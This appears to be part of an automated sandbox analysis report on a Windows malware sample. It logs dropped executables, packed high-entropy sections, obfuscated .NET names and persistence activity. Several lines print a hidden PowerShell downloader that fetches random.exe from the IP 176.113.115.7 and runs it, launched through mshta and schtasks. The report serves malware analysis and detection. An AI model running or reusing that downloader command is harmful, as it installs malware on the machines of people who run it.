Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Af3hqfTjFh.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000001C.00000003.1556143577.00000000061DA000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000001C.00000000.1553491361.0000000000433000.00000002.00000001.01000000.00000015.sdmp, apple.exe, 0000001C.00000003.1556649104.00000000061E4000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000001C.00000002.1561139167.0000000000433000.00000002.00000001.01000000.00000015.sdmp
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Af3hqfTjFh.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Unpacked PE file: 10.2.Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Unpacked PE file: 11.2.Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 12.2.rapes.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gvjtyabe:EW;ztcjzytj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Unpacked PE file: 50.2.466a80d633.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gjftmkgg:EW;nznnravi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;gjftmkgg:EW;nznnravi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 29.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 32.2.22.exe.400000.0.unpack
Source: Yara match File source: 28.3.apple.exe.270a7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\22.exe, type: DROPPED
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DE42DE
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6573468
Source: d6a397c01b.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x120e1d
Source: rapes.exe.10.dr Static PE information: real checksum: 0x1e41b1 should be: 0x1e6f9b
Source: amnew[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x724e5
Source: gron12321[1].exe.43.dr Static PE information: real checksum: 0x0 should be: 0x12c845
Source: crypted.54[1].exe.43.dr Static PE information: real checksum: 0x0 should be: 0x1361e9
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: real checksum: 0x1e41b1 should be: 0x1e6f9b
Source: EPTwCQd.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x17197c
Source: 7b35p_003.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x13e9c7
Source: 466a80d633.exe.21.dr Static PE information: real checksum: 0x485455 should be: 0x477b15
Source: q4jfn3p[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x144494
Source: EPTwCQd[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x17197c
Source: random[1].exe.21.dr Static PE information: real checksum: 0x4698cc should be: 0x4662af
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: real checksum: 0x0 should be: 0x121aba
Source: random[1].exe1.21.dr Static PE information: real checksum: 0x485455 should be: 0x477b15
Source: crypted.exe.43.dr Static PE information: real checksum: 0x0 should be: 0x1361e9
Source: v7942.exe.43.dr Static PE information: real checksum: 0x0 should be: 0xfa419
Source: f4d01cf3f8.exe.43.dr Static PE information: real checksum: 0x4698cc should be: 0x4662af
Source: q4jfn3p.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x144494
Source: 22.exe.28.dr Static PE information: real checksum: 0x0 should be: 0x1e9f1
Source: please18[1].43.dr Static PE information: real checksum: 0x0 should be: 0x69451
Source: amnew.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x724e5
Source: 7b35p_003[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x13e9c7
Source: please18.exe.43.dr Static PE information: real checksum: 0x0 should be: 0x69451
Source: apple[1].exe.21.dr Static PE information: real checksum: 0x0 should be: 0x52234
Source: v7942[1].exe.43.dr Static PE information: real checksum: 0x0 should be: 0xfa419
Source: random[1].exe0.21.dr Static PE information: real checksum: 0x0 should be: 0x120e1d
Source: alex1dskfmdsf.exe.43.dr Static PE information: real checksum: 0x0 should be: 0x121aba
Source: futors.exe.41.dr Static PE information: real checksum: 0x0 should be: 0x724e5
Source: EPTwCQd.exe0.21.dr Static PE information: real checksum: 0x0 should be: 0x17197c
Source: apple.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x52234
Source: 466f8e521c.exe.21.dr Static PE information: real checksum: 0x4698cc should be: 0x4662af
Source: 01ea7855d3.exe.43.dr Static PE information: real checksum: 0x485455 should be: 0x477b15
Source: gron12321.exe.43.dr Static PE information: real checksum: 0x0 should be: 0x12c845
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name:
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: .idata
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name:
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: gvjtyabe
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: ztcjzytj
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: .taggant
Source: rapes.exe.10.dr Static PE information: section name:
Source: rapes.exe.10.dr Static PE information: section name: .idata
Source: rapes.exe.10.dr Static PE information: section name:
Source: rapes.exe.10.dr Static PE information: section name: gvjtyabe
Source: rapes.exe.10.dr Static PE information: section name: ztcjzytj
Source: rapes.exe.10.dr Static PE information: section name: .taggant
Source: random[1].exe.21.dr Static PE information: section name:
Source: random[1].exe.21.dr Static PE information: section name: .idata
Source: random[1].exe.21.dr Static PE information: section name:
Source: random[1].exe.21.dr Static PE information: section name: vcauzjku
Source: random[1].exe.21.dr Static PE information: section name: tulszghi
Source: random[1].exe.21.dr Static PE information: section name: .taggant
Source: 466f8e521c.exe.21.dr Static PE information: section name:
Source: 466f8e521c.exe.21.dr Static PE information: section name: .idata
Source: 466f8e521c.exe.21.dr Static PE information: section name:
Source: 466f8e521c.exe.21.dr Static PE information: section name: vcauzjku
Source: 466f8e521c.exe.21.dr Static PE information: section name: tulszghi
Source: 466f8e521c.exe.21.dr Static PE information: section name: .taggant
Source: random[1].exe0.21.dr Static PE information: section name: .gxfg
Source: random[1].exe0.21.dr Static PE information: section name: .retplne
Source: random[1].exe0.21.dr Static PE information: section name: _RDATA
Source: random[1].exe0.21.dr Static PE information: section name: .cSs
Source: random[1].exe0.21.dr Static PE information: section name: .cSs
Source: d6a397c01b.exe.21.dr Static PE information: section name: .gxfg
Source: d6a397c01b.exe.21.dr Static PE information: section name: .retplne
Source: d6a397c01b.exe.21.dr Static PE information: section name: _RDATA
Source: d6a397c01b.exe.21.dr Static PE information: section name: .cSs
Source: d6a397c01b.exe.21.dr Static PE information: section name: .cSs
Source: 7b35p_003[1].exe.21.dr Static PE information: section name: ds0
Source: 7b35p_003[1].exe.21.dr Static PE information: section name: ds1
Source: 7b35p_003[1].exe.21.dr Static PE information: section name: ds2
Source: 7b35p_003.exe.21.dr Static PE information: section name: ds0
Source: 7b35p_003.exe.21.dr Static PE information: section name: ds1
Source: 7b35p_003.exe.21.dr Static PE information: section name: ds2
Source: EPTwCQd.exe.21.dr Static PE information: section name: .gxfg
Source: EPTwCQd.exe.21.dr Static PE information: section name: .retplne
Source: EPTwCQd.exe.21.dr Static PE information: section name: _RDATA
Source: EPTwCQd.exe.21.dr Static PE information: section name: .cSs
Source: EPTwCQd[1].exe.21.dr Static PE information: section name: .gxfg
Source: EPTwCQd[1].exe.21.dr Static PE information: section name: .retplne
Source: EPTwCQd[1].exe.21.dr Static PE information: section name: _RDATA
Source: EPTwCQd[1].exe.21.dr Static PE information: section name: .cSs
Source: EPTwCQd.exe0.21.dr Static PE information: section name: .gxfg
Source: EPTwCQd.exe0.21.dr Static PE information: section name: .retplne
Source: EPTwCQd.exe0.21.dr Static PE information: section name: _RDATA
Source: EPTwCQd.exe0.21.dr Static PE information: section name: .cSs
Source: q4jfn3p[1].exe.21.dr Static PE information: section name: .gxfg
Source: q4jfn3p[1].exe.21.dr Static PE information: section name: .retplne
Source: q4jfn3p[1].exe.21.dr Static PE information: section name: _RDATA
Source: q4jfn3p[1].exe.21.dr Static PE information: section name: .cSs
Source: q4jfn3p.exe.21.dr Static PE information: section name: .gxfg
Source: q4jfn3p.exe.21.dr Static PE information: section name: .retplne
Source: q4jfn3p.exe.21.dr Static PE information: section name: _RDATA
Source: q4jfn3p.exe.21.dr Static PE information: section name: .cSs
Source: apple[1].exe.21.dr Static PE information: section name: .didat
Source: apple.exe.21.dr Static PE information: section name: .didat
Source: random[1].exe1.21.dr Static PE information: section name:
Source: random[1].exe1.21.dr Static PE information: section name: .idata
Source: random[1].exe1.21.dr Static PE information: section name:
Source: random[1].exe1.21.dr Static PE information: section name: gjftmkgg
Source: random[1].exe1.21.dr Static PE information: section name: nznnravi
Source: random[1].exe1.21.dr Static PE information: section name: .taggant
Source: 466a80d633.exe.21.dr Static PE information: section name:
Source: 466a80d633.exe.21.dr Static PE information: section name: .idata
Source: 466a80d633.exe.21.dr Static PE information: section name:
Source: 466a80d633.exe.21.dr Static PE information: section name: gjftmkgg
Source: 466a80d633.exe.21.dr Static PE information: section name: nznnravi
Source: 466a80d633.exe.21.dr Static PE information: section name: .taggant
Source: 22.exe.28.dr Static PE information: section name: .code
Source: crypted.54[1].exe.43.dr Static PE information: section name: .gxfg
Source: crypted.54[1].exe.43.dr Static PE information: section name: .retplne
Source: crypted.54[1].exe.43.dr Static PE information: section name: _RDATA
Source: crypted.54[1].exe.43.dr Static PE information: section name: .cSs
Source: crypted.exe.43.dr Static PE information: section name: .gxfg
Source: crypted.exe.43.dr Static PE information: section name: .retplne
Source: crypted.exe.43.dr Static PE information: section name: _RDATA
Source: crypted.exe.43.dr Static PE information: section name: .cSs
Source: v7942[1].exe.43.dr Static PE information: section name: .gxfg
Source: v7942[1].exe.43.dr Static PE information: section name: .retplne
Source: v7942[1].exe.43.dr Static PE information: section name: _RDATA
Source: v7942.exe.43.dr Static PE information: section name: .gxfg
Source: v7942.exe.43.dr Static PE information: section name: .retplne
Source: v7942.exe.43.dr Static PE information: section name: _RDATA
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: section name: .gxfg
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: section name: .retplne
Source: alex1dskfmdsf[1].exe.43.dr Static PE information: section name: _RDATA
Source: alex1dskfmdsf.exe.43.dr Static PE information: section name: .gxfg
Source: alex1dskfmdsf.exe.43.dr Static PE information: section name: .retplne
Source: alex1dskfmdsf.exe.43.dr Static PE information: section name: _RDATA
Source: f4d01cf3f8.exe.43.dr Static PE information: section name:
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: .idata
Source: f4d01cf3f8.exe.43.dr Static PE information: section name:
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: vcauzjku
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: tulszghi
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: .taggant
Source: 01ea7855d3.exe.43.dr Static PE information: section name:
Source: 01ea7855d3.exe.43.dr Static PE information: section name: .idata
Source: 01ea7855d3.exe.43.dr Static PE information: section name:
Source: 01ea7855d3.exe.43.dr Static PE information: section name: gjftmkgg
Source: 01ea7855d3.exe.43.dr Static PE information: section name: nznnravi
Source: 01ea7855d3.exe.43.dr Static PE information: section name: .taggant
Source: gron12321[1].exe.43.dr Static PE information: section name: .gxfg
Source: gron12321[1].exe.43.dr Static PE information: section name: .retplne
Source: gron12321[1].exe.43.dr Static PE information: section name: _RDATA
Source: gron12321.exe.43.dr Static PE information: section name: .gxfg
Source: gron12321.exe.43.dr Static PE information: section name: .retplne
Source: gron12321.exe.43.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DFE953 push eax; iretd 0_2_00DFE958
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E00A76 push ecx; ret 0_2_00E00A89
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4164A pushad ; ret 0_2_00E4164B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF9C11A00BD pushad ; iretd 8_2_00007FF9C11A00C1
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: entropy: 7.973325401220018
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE.5.dr Static PE information: section name: gvjtyabe entropy: 7.954122802946133
Source: rapes.exe.10.dr Static PE information: section name: entropy: 7.973325401220018
Source: rapes.exe.10.dr Static PE information: section name: gvjtyabe entropy: 7.954122802946133
Source: random[1].exe.21.dr Static PE information: section name: entropy: 7.982738862956585
Source: random[1].exe.21.dr Static PE information: section name: vcauzjku entropy: 7.946267340234163
Source: 466f8e521c.exe.21.dr Static PE information: section name: entropy: 7.982738862956585
Source: 466f8e521c.exe.21.dr Static PE information: section name: vcauzjku entropy: 7.946267340234163
Source: 7b35p_003[1].exe.21.dr Static PE information: section name: ds2 entropy: 7.990733002735885
Source: 7b35p_003.exe.21.dr Static PE information: section name: ds2 entropy: 7.990733002735885
Source: random[1].exe1.21.dr Static PE information: section name: entropy: 7.984317462641947
Source: random[1].exe1.21.dr Static PE information: section name: gjftmkgg entropy: 7.9460606025010625
Source: 466a80d633.exe.21.dr Static PE information: section name: entropy: 7.984317462641947
Source: 466a80d633.exe.21.dr Static PE information: section name: gjftmkgg entropy: 7.9460606025010625
Source: please18.exe.43.dr Static PE information: section name: .text entropy: 7.1539318576021165
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: entropy: 7.982738862956585
Source: f4d01cf3f8.exe.43.dr Static PE information: section name: vcauzjku entropy: 7.946267340234163
Source: 01ea7855d3.exe.43.dr Static PE information: section name: entropy: 7.984317462641947
Source: 01ea7855d3.exe.43.dr Static PE information: section name: gjftmkgg entropy: 7.9460606025010625
Source: please18[1].43.dr Static PE information: section name: .text entropy: 7.1539318576021165
Source: please18.exe.43.dr, k3F1Qt.cs High entropy of concatenated method names: 'Ai8d7C', 'q0C8Ei', 'a8G5Nq', 'Dg60Fn', 'p7LHx1', 'k4R6Kn', 'x1WCk9', 'j6E1Nc', 'e5F3Yd', 'k2GRn7'
Source: please18.exe.43.dr, Hk76Ky.cs High entropy of concatenated method names: 'e2A8Gnw', 'Nm70ZaP', 'w0J6MeQ', 'Mb5k1NS', 'Ef52JzH', 'Bt67Eqf', 'o3BGm0y', 'Fw2e1M3', 'r9W3Ktc', 'j2P6CkD'
Source: please18.exe.43.dr, j9LXn58.cs High entropy of concatenated method names: 'Zt28Nbi', 'd7L8WmQ', 'b6R3Zte', 'c5KSb08', 'Zw69Fce', 'y3JMw02', 'j2RKd50', 'Ls94NdK', 'q5CTg6y', 'Lp81Rdm'
Source: please18.exe.43.dr, We41Kg.cs High entropy of concatenated method names: 'Ff7e2A', 'Gd3s9D', 'a8KXm6', 'Em3k5G', 'k5Q9Eg', 's7R2Co', 'Ds0k6Q', 'Pq96Fg', 'm1G0Dr', 'w6W0Tz'
Source: please18.exe.43.dr, i9EZo8.cs High entropy of concatenated method names: 'Ey8z6A', 'f9P7Kn', 's6J5Zi', 'Se9x0L', 'q7L5Bi', 'f5E2Jg', 'Tc1x0B', 'c3CLq0', 'm6Z4Yf', 'Cz23Sq'
Source: please18.exe.43.dr, Cw53Jay.cs High entropy of concatenated method names: 'Zq1n9J3', 'x4D8QsR', 'o2ZTb8x', 'y2E0SnW', 'n4SWx15', 'Re9f6P5', 'Zg4n8W2', 'q0ZBg8b', 'y9BRc73', 'z7Q8Rrb'
Source: please18[1].43.dr, k3F1Qt.cs High entropy of concatenated method names: 'Ai8d7C', 'q0C8Ei', 'a8G5Nq', 'Dg60Fn', 'p7LHx1', 'k4R6Kn', 'x1WCk9', 'j6E1Nc', 'e5F3Yd', 'k2GRn7'
Source: please18[1].43.dr, Hk76Ky.cs High entropy of concatenated method names: 'e2A8Gnw', 'Nm70ZaP', 'w0J6MeQ', 'Mb5k1NS', 'Ef52JzH', 'Bt67Eqf', 'o3BGm0y', 'Fw2e1M3', 'r9W3Ktc', 'j2P6CkD'
Source: please18[1].43.dr, j9LXn58.cs High entropy of concatenated method names: 'Zt28Nbi', 'd7L8WmQ', 'b6R3Zte', 'c5KSb08', 'Zw69Fce', 'y3JMw02', 'j2RKd50', 'Ls94NdK', 'q5CTg6y', 'Lp81Rdm'
Source: please18[1].43.dr, We41Kg.cs High entropy of concatenated method names: 'Ff7e2A', 'Gd3s9D', 'a8KXm6', 'Em3k5G', 'k5Q9Eg', 's7R2Co', 'Ds0k6Q', 'Pq96Fg', 'm1G0Dr', 'w6W0Tz'
Source: please18[1].43.dr, i9EZo8.cs High entropy of concatenated method names: 'Ey8z6A', 'f9P7Kn', 's6J5Zi', 'Se9x0L', 'q7L5Bi', 'f5E2Jg', 'Tc1x0B', 'c3CLq0', 'm6Z4Yf', 'Cz23Sq'
Source: please18[1].43.dr, Cw53Jay.cs High entropy of concatenated method names: 'Zq1n9J3', 'x4D8QsR', 'o2ZTb8x', 'y2E0SnW', 'n4SWx15', 'Re9f6P5', 'Zg4n8W2', 'q0ZBg8b', 'y9BRc73', 'z7Q8Rrb'

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe File created: C:\Users\user\AppData\Local\Temp\ssisd.sys
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe File created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10041880101\01ea7855d3.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352670101\466f8e521c.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\EPTwCQd[1].exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\v7942[1].exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\please18[1]
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\alex1dskfmdsf[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\q4jfn3p[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352700101\EPTwCQd.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\apple[1].exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe File created: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File created: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe
